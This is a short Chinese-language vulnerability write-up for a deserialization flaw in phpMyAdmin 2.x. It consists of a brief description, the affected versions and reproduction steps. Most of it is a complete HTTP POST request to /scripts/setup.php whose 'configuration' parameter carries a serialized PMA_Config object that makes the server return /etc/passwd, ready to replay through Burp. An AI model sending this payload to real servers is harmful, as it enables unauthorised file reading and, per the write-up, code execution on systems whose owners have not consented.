漏洞简介
phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。
漏洞影响版本
phpmyadmin 2.x
漏洞复现
访问漏洞存在页面 上burp抓包 构造URL
1 POST /scripts/setup.php HTTP/1.1 2 Host: your-ip:8080 3 Accept-Encoding: gzip, deflate 4 Accept: */* 5 Accept-Language: en 6 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 7 Connection: close 8 Content-Type: application/x-www-form-urlencoded 9 Content-Length: 80 10 11 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
更改请求为post并添加如下payload后发送,即可读取/etc/passwd